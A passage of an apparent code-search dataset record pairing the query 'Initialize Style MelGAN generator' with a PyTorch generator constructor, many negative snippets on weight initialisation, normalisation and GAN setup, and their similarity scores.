rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def 
normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def filter_normalize_(self, ref_point: 'ModelParameters', order=2):\n for l in range(len(self.parameters)):\n # normalize one-dimensional bias vectors\n if len(self.parameters[l].size()) == 1:\n self.parameters[l] *= (ref_point.parameters[l].norm(order) / self.parameters[l].norm(order))\n # normalize two-dimensional weight vectors\n for f in range(len(self.parameters[l])):\n self.parameters[l][f] *= ref_point.filter_norm((l, f), order) / (self.filter_norm((l, f), order))", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - 
check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def update_layers(self):\n\n # Para cada layer atualiza utilizando o gradiente descendente e o learning rate\n for layer in self.layers:\n layer.update_layer(self.learning_rate)", "def weights_init(mod):\n classname = mod.__class__.__name__\n if classname.find('Conv') != -1:\n mod.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n mod.weight.data.normal_(1.0, 0.02)\n mod.bias.data.fill_(0)", "def init_weights(self):\n\n params = torch.load(self.resnet_weight)\n\n self.fc1.weight.data = params['state_dict']['module.fc.weight'].clone()\n self.fc1.bias.data = params['state_dict']['module.fc.bias'].clone()\n\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc4.in_features +\n self.fc4.out_features)\n self.fc4.weight.data.uniform_(-r, r)\n self.fc4.bias.data.fill_(0)", "def spectral_norm_parallel(self):\n weights = {}\n for l in self.all_conv_layers:\n weight = l.weight_normalized\n weight_mat = weight.view(weight.size(0), -1)\n if weight_mat.shape not in weights:\n weights[weight_mat.shape] = []\n weights[weight_mat.shape].append(weight_mat)\n loss = 0\n for i in weights:\n weights[i] = torch.stack(weights[i], dim=0)\n with torch.no_grad():\n num_iter = self.num_power_iter\n if i not in self.sr_u:\n num_w, row, col = weights[i].shape\n self.sr_u[i] = F.normalize(torch.ones(num_w, row).normal_(0, 1), dim=1, eps=0.001)\n self.sr_v[i] = F.normalize(torch.ones(num_w, col).normal_(0, 1), dim=1, eps=0.001)\n num_iter = 10 * self.num_power_iter\n for j in range(num_iter):\n self.sr_v[i] = F.normalize(torch.matmul(self.sr_u[i].unsqueeze(1), weights[i]).squeeze(1), dim=1, eps=0.001)\n self.sr_u[i] = F.normalize(torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)).squeeze(2), dim=1, eps=0.001)\n sigma = torch.matmul(self.sr_u[i].unsqueeze(1), torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)))\n loss += torch.sum(sigma)\n return loss", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def update_weights(self):\n activation, activation_p = self.feedforward()\n # initialize delta_weights\n delta_w = np.zeros(2)\n # simultaneous calculate delta_weights\n for i, element in enumerate(self.y):\n delta_w += (activation[i]-element)*(activation_p[i])*self.X[i]\n # update weight\n self.weights -= self.alfa*delta_w", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return 
array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def initialize_weights(self):\n tf.nest.map_structure(\n weights_initializer.WeightsInitializer.initialize_layer_or_model,\n self._layer_nest)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def weights_init(m):\n if (\n isinstance(m, nn.Linear)\n or isinstance(m, nn.EmbeddingBag)\n or isinstance(m, nn.Embedding)\n or isinstance(m, SparseLinear)\n ):\n nn.init.xavier_normal_(m.weight)", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model 
weights')\n\treturn model", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def normalization(channels):\n return GroupNorm32(32, channels)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def forward_propagate(self):\n for i in range(0, len(self.output_layer)):\n output = 0\n\n # Loop through each Neuron in the hidden layer\n for neuron in self.hidden_layer:\n output += neuron.weights[i] * neuron.output\n\n # Update summation for output classifier\n self.output_layer[i] = output", "def weights_init_normal(m):\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)", "def model_normalize_(self, ref_point: 'ModelParameters', order=2):\n for parameter in self.parameters:\n parameter *= (ref_point.model_norm(order) / self.model_norm())", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def apply_weights(self):\n return self.X.dot(self.get_weights())", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def normalize_weights(self, labels, weights):\n if self._ragged:\n labels, _, weights, _ = utils.ragged_to_dense(labels, None, weights)\n return self._normalize_weights_impl(labels, weights)", "def normalizeWeights(self):\n\n\t\t# Normalizing crossover and mutation handler weights, result is a CDF\n\t\ttotal = sum(self.mutation_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.mutation_handlers_weights)):\n\t\t\tcumsum += self.mutation_handlers_weights[i]\n\t\t\tself.mutation_handlers_weights[i] = cumsum/total\n\t\ttotal = sum(self.crossover_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.crossover_handlers_weights)):\n\t\t\tcumsum += self.crossover_handlers_weights[i]\n\t\t\tself.crossover_handlers_weights[i] = cumsum/total", "def update_network(self, a, batch_size):\n for layer in self.layers:\n layer.weights_update(a, self.alpha, self.l2_lambda, batch_size)\n a = layer.a", "def init_weights(self):\n # Initialize 
weights\n self.apply(self._init_weights)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def apply_batch_normalization(self, layer):\n if type(layer) is not BatchNormalization:\n raise ValueError('The `layer` must be neoml.Dnn.BatchNormalization.')\n\n self._internal.apply_batch_normalization(layer._internal)", "def normalize(w: torch.Tensor):\n\n if w.dim() > 1:\n return _matrix(w)\n\n return _vector(w)", "def init_weights(self, leveledinit: bool, kernel_size: int, bias: bool) -> None:\n if leveledinit:\n nn.init.normal_(self.conv1d.weight, std=1e-3)\n nn.init.normal_(self.conv1d.bias, std=1e-6)\n with torch.no_grad():\n self.conv1d.weight[:, 0, :] += 1.0 / kernel_size\n else:\n nn.init.xavier_uniform_(self.conv1d.weight)\n\n if self.embed in (\"pre\", \"post\"):\n nn.init.xavier_uniform_(self.embedding.weight)", "def normalize_layer(tensor, name, norm_use='bn'):\n if norm_use == \"gn\":\n x = GroupNorm(name=name + 'gn', groups=32)(tensor)\n elif norm_use == \"bn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'bn', epsilon=1.001e-5)(tensor)\n elif norm_use == \"rbn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'rbn', epsilon=1.001e-5, renorm=True)(tensor)\n elif norm_use == \"in\":\n x = InstanceNormalization(axis=-1, name=name + 'in')(tensor)\n else:\n x = tensor\n return x", "def _initialize_weights(self):\n for _, cell in self.cells_and_names():\n if isinstance(cell, nn.Conv2d):\n cell.weight.set_data(orthogonal(cell.weight.shape, 0.6))\n if cell.bias is not None:\n cell.bias.set_data(\n init.initializer(init.Constant(0.01), cell.bias.shape,\n cell.bias.dtype))", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)" ]
[ "0.71435213", "0.71435213", "0.71435213", "0.7134102", "0.70675933", "0.70675933", "0.70535696", "0.7048801", "0.70298284", "0.6807073", "0.67789346", "0.6764012", "0.6759336", "0.67359823", "0.671116", "0.6696031", "0.6583814", "0.6554803", "0.65268165", "0.65178454", "0.6516569", "0.6463748", "0.64564633", "0.64395547", "0.6430028", "0.6421856", "0.640334", "0.63897395", "0.6374966", "0.6365222", "0.63641244", "0.6354269", "0.6340741", "0.6338719", "0.63375056", "0.6309535", "0.62983793", "0.62983793", "0.6297496", "0.6296494", "0.62862206", "0.62776047", "0.62717974", "0.627027", "0.6268798", "0.6264878", "0.6216303", "0.6194924", "0.61866164", "0.61798894", "0.61327094", "0.61231303", "0.6123015", "0.61202216", "0.6115392", "0.60985583", "0.6084887", "0.60684794", "0.6061884", "0.60574734", "0.6041368", "0.6030597", "0.60133255", "0.6010806", "0.6009379", "0.6008268", "0.6008268", "0.60043484", "0.59894454", "0.59836566", "0.59775686", "0.59664863", "0.59664863", "0.59540474", "0.5954036", "0.5951746", "0.5950169", "0.5947529", "0.5942369", "0.59406936", "0.5939528", "0.5939528", "0.5936708", "0.59348613", "0.5908261", "0.59041584", "0.59008473", "0.5899256", "0.5888492", "0.588707", "0.58829534", "0.5882231", "0.5871732", "0.5871084", "0.5860187", "0.585934", "0.585585", "0.58556217" ]
0.7316938
2
Initialize Style MelGAN generator.
def __init__( self, in_channels=128, aux_channels=128, channels=64, out_channels=1, num_embs=100, num_spk_embs=128, spk_emb_dim=128, concat_spk_emb=False, kernel_size=9, dilation=2, bias=True, noise_upsample_scales=[11, 2, 2, 2], noise_upsample_activation="LeakyReLU", noise_upsample_activation_params={"negative_slope": 0.2}, upsample_scales=[2, 2, 2, 2, 2, 2, 2, 2, 1], upsample_mode="nearest", gated_function="softmax", use_weight_norm=True, ): super().__init__() self.in_channels = in_channels # define id embedding self.emb = torch.nn.Embedding( num_embeddings=num_embs, embedding_dim=aux_channels ) self.spk_emb = torch.nn.Embedding( num_embeddings=num_spk_embs, embedding_dim=spk_emb_dim ) self.concat_spk_emb = concat_spk_emb if not concat_spk_emb: assert aux_channels == spk_emb_dim else: aux_channels = aux_channels + spk_emb_dim noise_upsample = [] in_chs = in_channels for noise_upsample_scale in noise_upsample_scales: # NOTE(kan-bayashi): How should we design noise upsampling part? noise_upsample += [ torch.nn.ConvTranspose1d( in_chs, channels, noise_upsample_scale * 2, stride=noise_upsample_scale, padding=noise_upsample_scale // 2 + noise_upsample_scale % 2, output_padding=noise_upsample_scale % 2, bias=bias, ) ] noise_upsample += [ getattr(torch.nn, noise_upsample_activation)( **noise_upsample_activation_params ) ] in_chs = channels self.noise_upsample = torch.nn.Sequential(*noise_upsample) self.noise_upsample_factor = np.prod(noise_upsample_scales) self.blocks = torch.nn.ModuleList() aux_chs = aux_channels for upsample_scale in upsample_scales: self.blocks += [ TADEResBlock( in_channels=channels, aux_channels=aux_chs, kernel_size=kernel_size, dilation=dilation, bias=bias, upsample_factor=upsample_scale, upsample_mode=upsample_mode, gated_function=gated_function, ), ] aux_chs = channels self.upsample_factor = np.prod(upsample_scales) self.output_conv = torch.nn.Sequential( torch.nn.Conv1d( channels, out_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2, ), torch.nn.Tanh(), ) # apply weight norm if use_weight_norm: self.apply_weight_norm() # reset parameters self.reset_parameters()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def model_setup(self):\n self.DNN = SganMLP(self.settings.number_of_bins)\n self.D = SganMLP(self.settings.number_of_bins)\n self.G = Generator()", "def model_setup(self):\n self.DNN = DgganMLP(self.settings.hidden_size)\n self.D = DgganMLP(self.settings.hidden_size)\n self.G = Generator(self.settings.hidden_size)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def init_net(self):\r\n # initialize the generator network\r\n g_net = Net(\r\n self.architecture['generator'], net_name='gen',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Gen = Routine(g_net)\r\n self.Gen.add_input_layers([64, self.code_size], [0])\r\n self.Gen.seq_links(list(range(g_net.num_layers)))\r\n self.Gen.add_output_layers([g_net.num_layers - 1])\r\n\r\n # initialize the generator network\r\n d_net = Net(\r\n self.architecture['discriminator'], net_name='dis',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Dis = Routine(d_net)\r\n self.Dis.add_input_layers([64] + list(self.architecture['input'][0]), [0])\r\n self.Dis.seq_links(list(range(d_net.num_layers)))\r\n self.Dis.add_output_layers([d_net.num_layers - 1])", "def initialize(self):\n self.write_model(path=PATH.GRAD, suffix='new')\n\n if PAR.RANDOM_OVER_IT or optimize.iter == 1:\n self.get_random_frequencies()\n\n print('Generating synthetics')\n system.run('solver', 'eval_func',\n hosts='all',\n path=PATH.GRAD)\n\n self.write_misfit(path=PATH.GRAD, suffix='new')", "def __init__(self, **kwargs: dict) -> None:\n super(AnimeGAN_v2, self).__init__()\n self.model_name: str = 'animeGAN_v2'\n self.model_version: str = '1.0.0'\n \n self.pretrained_model_path: str = kwargs['pretrained_model_path']\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.set_grad_enabled(False)\n\n self.model = Generator().eval().to(self.device)\n ckpt = torch.load(self.pretrained_model_path, map_location=self.device)\n self.model.load_state_dict(ckpt)", "def __init__(self, model_name, logger=None, gpu_ids=None):\n super().__init__(model_name, 'generator', logger, gpu_ids)", "def __init__(self, random_generator: RandomState):\n super().__init__([MoldelStacker(random_generator), SocialMediaLayer()])", "def __init__(self, use_wasserstein=True):\n\n opt = WassersteinCycleGANTestOptions if use_wasserstein else CycleGANTestOptions\n\n opt.checkpoints_dir = os.path.join(\n pathlib.Path(__file__).parent.absolute(), opt.checkpoints_dir\n )\n\n tf_properties = {\n \"load_size\": opt.load_size,\n \"crop_size\": opt.crop_size,\n \"preprocess\": opt.preprocess,\n \"mask\": os.path.join(os.path.dirname(__file__), opt.mask),\n \"no_flip\": True,\n \"grayscale\": True,\n }\n self.transform = get_transform(**tf_properties)\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if opt.is_wgan:\n netg_b_to_a = resnet_generator.ResnetGenerator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n get_norm_layer(opt.norm),\n dilations=opt.dilations,\n conv_layers_in_block=opt.conv_layers_in_block,\n )\n else:\n netg_b_to_a = generator.create_generator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.netg,\n opt.norm,\n not opt.no_dropout,\n opt.activation,\n opt.conv_layers_in_block,\n opt.dilations,\n )\n\n netg_b_to_a = init_net(netg_b_to_a, opt.init_type, opt.init_gain, self.device)\n\n ModelClass = CycleGANModel if not opt.is_wgan else 
WassersteinCycleGANModel\n\n self.model = ModelClass.from_dict(\n netg_a_to_b=None, netg_b_to_a=netg_b_to_a, **opt.to_dict()\n )\n\n self.model.networks.load(\n os.path.join(opt.checkpoints_dir, opt.name, f\"{opt.epoch}_net_\"),\n device=self.device,\n )\n self.model.eval()", "def build_gan(self):\n\n # Specify te generators used to build various components.\n optimizer_generator = Adam(0.0002, 0.5)\n optimizer_discriminator = Adam(0.0002, 0.5)\n optimizer_GAN = Adam(0.0002, 0.5)\n\n loss_measure_generator = \"binary_crossentropy\"\n loss_measure_discriminator = \"binary_crossentropy\"\n loss_measure_GAN = \"binary_crossentropy\"\n\n metrics = [\"accuracy\", \"mae\", \"mse\", \"mape\", \"cosine\"]\n\n # See if the specified model paths exist, if they don't then we start training new models\n if (\n hasattr(self, \"discriminator_path\")\n and hasattr(self, \"generator_path\")\n and self.discriminator_path.is_file()\n and self.generator_path.is_file()\n ):\n self.discriminator = load_model(self.discriminator_path)\n self.generator = load_model(self.generator_path)\n print(\"Loaded models...\")\n else: # training new model.\n print(\"Training models...\")\n\n # Generate the tensorboard and its call back\n callback_tensorboard = TensorBoard(\n log_dir=path_log_run, histogram_freq=0, write_images=True\n )\n\n # self.callbacks_list = [callback_tensorboard]\n\n # Build discriminator and compile it.\n self.discriminator = self.build_discriminator()\n\n # Training discriminator!\n self.discriminator.compile(\n loss=loss_measure_discriminator,\n optimizer=optimizer_discriminator,\n # metrics=metrics,\n # callbacks=self.callbacks_list,\n )\n\n # Build generator and compile it.\n self.generator = self.build_generator()\n\n # Training generator!\n self.generator.compile(\n loss=loss_measure_generator,\n optimizer=optimizer_generator,\n # callbacks=self.callbacks_list,\n )\n\n # These next few lines setup the training for the GAN, which the input Vector has a shape of noise_parameters\n z = Input(shape=(self.dimensions_noise,))\n img = self.generator(z)\n\n self.discriminator.trainable = False\n\n # Call the discriminator on the image generated by the generator.\n # Store the output\n valid = self.discriminator(img)\n\n # Form a model that combine both the input and the output pair.\n self.combined = Model(z, valid)\n\n # Compile the model using binary_crossentropy with the\n self.combined.compile(loss=loss_measure_GAN, optimizer=optimizer_GAN)", "def __init__(self, generator, discriminator, noise_dim, save_path):\n self.generator = generator\n self.discriminator = discriminator\n self.noise_dim = noise_dim\n self.save_path = save_path\n self.check_points_path = os.path.join(save_path, 'check_points')\n self.output_image_path = os.path.join(save_path, 'images_during_training')\n self.generator.generate()", "def setup(self):\n\n self.points = [[0.360502, 0.535494],\n [0.476489, 0.560185],\n [0.503125, 0.601218],\n [0.462382, 0.666667],\n [0.504702, 0.5]]\n self.max_neighbors = 4\n self.beta = 1\n self.graph = 'beta skeleton'\n self.edges = [0, 1, 0, 2, 0, 3, 0, 4,\n 1, 3, 1, 4,\n 2, 3, 2, 4,\n 3, 4]", "def init_batch(self):\n pass", "def init():", "def setGenerators(self):\n shape = (self.input_shape[0],self.input_shape[1])\n self.trainGen,self.validateGen = getBatchGenerators(self.batch_size,\n self.dataPath,\n shape,\n self.classMap,\n self.regression)", "def initialise_theano_rng(self):\n\n\t\tself.theano_rng = RandomStreams(self.rng.randint(2**30))", "def init_fn(init_savers, sess):\n ## Load 
Generator weights from MaskGAN checkpoint.\n if FLAGS.maskgan_ckpt:\n print('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n print('Asserting Generator is a seq2seq-variant.')\n tf.logging.info('Asserting Generator is a seq2seq-variant.')\n assert FLAGS.generator_model.startswith('seq2seq')\n init_saver = init_savers['init_saver']\n init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n ## Load the Discriminator weights from the MaskGAN checkpoint if\n # the weights are compatible.\n print('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n dis_init_saver = init_savers['dis_init_saver']\n dis_init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n else:\n return", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def load_generator(\n ckpt, is_stylegan1, G_res, out_size, noconst, latent_dim, n_mlp, channel_multiplier, dataparallel, base_res_factor\n):\n if is_stylegan1:\n generator = G_style(output_size=out_size, checkpoint=ckpt).cuda()\n else:\n generator = Generator(\n G_res,\n latent_dim,\n n_mlp,\n channel_multiplier=channel_multiplier,\n constant_input=not noconst,\n checkpoint=ckpt,\n output_size=out_size,\n base_res_factor=base_res_factor,\n ).cuda()\n if dataparallel:\n generator = th.nn.DataParallel(generator)\n return generator", "def initialize(self):\n logger.debug(\"Begin Generation\")\n self.events.begin_generation()", "def initialize(self, parser):\n # basic parameters\n parser.add_argument('--name', type=str, default='cyclegan',\n help='name of the experiment. It decides where to store samples and models')\n parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--checkpoints_dir', type=str, default='../ckpts7', help='models are saved here')\n # model parameters\n parser.add_argument('--model', type=str, default='cycle_gan_3d',\n help='chooses which model to use. [cycle_gan_3d | cycle_gan_2d_slice | test ]')\n parser.add_argument('--input_nc', 